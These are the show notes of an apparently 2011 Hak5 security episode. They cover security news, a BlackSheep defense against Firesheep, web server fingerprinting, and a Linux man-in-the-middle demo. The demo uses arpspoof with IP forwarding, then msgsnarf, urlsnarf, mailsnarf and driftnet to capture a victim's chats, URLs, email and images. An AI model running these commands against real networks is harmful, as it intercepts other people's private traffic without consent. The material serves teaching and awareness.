Defending against cookie hijacking attacks, man-in-the-middle tools for Linux, fingerprinting web servers the easy way, managing multiple SSH sessions and tracking govenment spy satellites! All that and more, this time on Hak5!
Jailbreaking is fun! RedSn0w has just been released by the DevTeam as a nice and easy untethered jailbreak for iOS 4.3.1. It’s available on Windows and OSX for all your Apple devices, except for the iPad 2 because apparently the security on the new tablet has been beefed up. But, I’m sure it won’t take long for someone to figure out a way around it.
While we typically don’t follow the hijinks of Anonymous, the group has recently targeted Sony’s playstation.com with a Denial of service attack that left the website periodically inaccessible. The group released a manifesto announcing operation sony and pronunced the GeoHot lawsuit as an “unforgiveable offense against free speech and internet freedom, primary sources of free lulz”. Sony later tweeted that the PSN may be inaccessible due to “sporadic maintenance”
If you get some spam very soon in your inbox, it may be because of a security breach at Epsilon. Epsilon, the world’s largest email marketing service, says the only information hackers got were names and email addresses. I’ve gotten several emails from companies so far, all saying the same thing- “your e-mail address may have been exposed by unauthorized entry into Epsilon’s system bla bla bla”- but this still means we’re more vulnerable to phishing scams and such. So, be aware and don’t give out your info to any weird emails.
RSA recently outlined how their network was compromised in the much publicized attack on their network weeks ago. Over a 2-day period attackers sent two different phishing emails to employees with subjects like “2011 Recruitment Plan” which contained an attached excel spreadsheet. The spreadsheet contained a zero-day exploit that took advantage of an Adobe Flash vulnerability. From there the attacker installed a cuztomized version of the Poison Ivy RAT and began escalating privledges across the network. The Flash vulnerability has since been patched and RSA claims that the seeds used to generate RSA keys have not been compromised.
Just plain awesome! You remember the Commodore 64? Of course you do! Well apparently, Commodore USA is coming out with a brand spankin new C64 with some nice PC specs, with advertisements along side the release of Tron: Legacy on DVD. No details on the specs just yet, but I’ll be checking back on their website to find out more…
Kerby’s Internet Protocol of the week
Crack the Code Challenge
Do you have what it takes to compete in our Crack The Code Challenge — brought to you by GoToAssist Express? Test your skills in our private lab network and bid for the title supreme leet hax0r. Winners will be featured on a future episode of Hak5!
ARP Spoofing with DSniff
Recently we’ve been having a lot of fun with Man-in-the-middle attacks. Shannon showed how to perform an arp cache poisoning attack on Windows using Cain & Abel. I showed how to detect the attack using XARP. She showed off sidejacking with Firesheep. Honestly eavesdropping is just plain fun. So this week I’d like to demo a couple of tools for us linux folks.
Again the premise is all the same. We’ll be using command line tools to tell our victim we’re the router, and vise versa.
The tools we’ll be using are the dsniff suite and driftnet. If you don’t already have ’em and you’re rocking Ubuntu it’s simply a matter of issuing sudo apt-get install driftnet dsniff
Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our targets to flow through our machine.
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 10.13.37.1 10.13.37.124
arpspoof -t 10.13.37.1 10.13.37.124
msgsnarf -i eth0
urlsnart -i eth0
mailsnarf -i eth0
driftnet -i eth0
Last week’s trivia question was: What is this prototype built in 1998 that encrypts telephone calls using the symmetric encryption algorithm IDEA? The answer was Cryptophon.
This week’s trivia question is: What is the name of this prominent computer club that was founded in Berlin in 1981?
Answer at hak5.wpengine.com/trivia for a chance to win some swag!
Blacksheep – Firesheep defense
On a recent episode, I walked you through how to use FireSheep to hijack another computer’s session on your wireless network. I was able to see Darren log onto Twitter, click on his username, and write on his twitter account as @hak5darren, not @snubs. Haha, I just hacked his twitter, right?
Well, today, I’d like to show you BlackSheep, which does the exact opposite. If FireSheep is being used by someone on your network, you can be warned and block against it. BlackSheep is a Firefox add-on, just like FireSheep, that was based right off the same source code. So it reuses the same network listening back-end and that same list of sites and corresponding cookies, etc. By doing this, it ensure that the fake traffic generated by BlackSheep is what FireSheep is expecting to see. BlackSheep even will show you the IP address of the person’s computer trying to hijack your account.
Now to get it working. First, download the BlackSheep add-on. Disable FireSheep if you have it as well, so BlackSheep doesn’t detect it.
In the options menu, choose the interval you want BlackSheep to create fake traffic. It’s default is 5 minutes which works fine. Click ok and you’re done configuring. Now, if FireSheep is detected on your network, you’ll see this popup on your screen.
BlackSheep is available for Mac, Windows, and Linux. You still need WinPCap if you’re on Windows and it only works with the Firefox, and only 32-bit.
Although BlackSheep does help with FireSheep, you should still be using HTTPS for your surfing.
HakTip: Identifying Web Servers
Wayno from pkill-9 sent this by. Two quick and dirty ways to ID a web server. First:
curl -I www.hak5.wpengine.com
Should result in
HTTP/1.1 200 OK Date: Tue, 05 Apr 2011 01:00:09 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/ 2.1 mod_bwlimited/1.4 FrontPage/22.214.171.12435 PHP/5.2.9 Last-Modified: Tue, 05 Apr 2011 00:04:06 GMT Accept-Ranges: bytes Content-Length: 66982 X-Pingback: http://www.Hak5.org/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Vary: Accept-Encoding,Cookie Content-Type: text/html; charset=UTF-8
The second, geekier way is to do it with telnet.
telnet www.hak5.wpengine.com 80 HEAD / HTTP/1.0
Want to share your tips with us? firstname.lastname@example.org
Emails: SSH Multiplexing & Satellite tracking
Thank you so much for the info you have been giving out on screen, and multiplexing screens! I just wanted to make you aware, if you weren't already, of PuTTY Connection Mamager. The most reported feature is the tabbed interface for PuTTY, but for me the best feature is the screen splitting. I can have one window with all of my putty sessions open and arranged how I want. Also, you can send commands to all viewable putty sessions, so I can run one command on each of my servers at the same time.
target="_blank">Gpredict is a real-time satellite tracking and orbit prediction application, and it actually runs better on my WinblowsXP than it does on my many Ubuntu (10.4,10.10,and bt4R2) laptops. It's really cool, I happen to be a Telecommunications/SatCom guy and this software is really neat because it has all the satellites orbit locations pre-loaded and after you put in your geo coordinates it will tell you when the satellite will be visable and at what Azimuth and Elevation you should be using to see the beacon (via spectrum analyzer)... And if you have no idea what I'm saying: You can select all the military satellites from a drop down list and watch them move over the globe... NEAT!!!
Keep up with the latest on Hak5 by following us on Twitter or Facebook. Subscribe and get your weekly technolust delivered automatically. Or show your support and grab some swag from the HakShop - including the new airport friendly WiFi Pineapple and hoodie. Finally if you'd like to suggest a topic
for ask a question feel free to hit up email@example.com.